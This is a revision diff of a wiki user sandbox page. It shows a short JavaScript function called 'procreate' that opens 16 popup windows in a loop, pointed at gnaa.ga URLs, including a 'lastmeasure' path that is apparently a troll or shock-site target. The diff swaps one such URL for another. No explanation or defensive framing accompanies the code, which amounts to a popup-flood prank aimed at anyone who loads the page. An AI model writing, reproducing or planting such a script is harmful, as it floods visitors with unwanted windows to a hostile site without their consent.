User:Pmb1226/Sandbox: Difference between revisions

Pmb1226 (talk | contribs)
No edit summary
Pmb1226 (talk | contribs)
No edit summary
Line 29: Line 29:
function procreate() {
function procreate() {
    for(i = 0; i < 16; i++) {
    for(i = 0; i < 16; i++) {
        popUp("https://gnaa.ga/lastmeasure/Hello.jpg");
        popUp("https://gnaa.ga/members");
    }
    }
}
}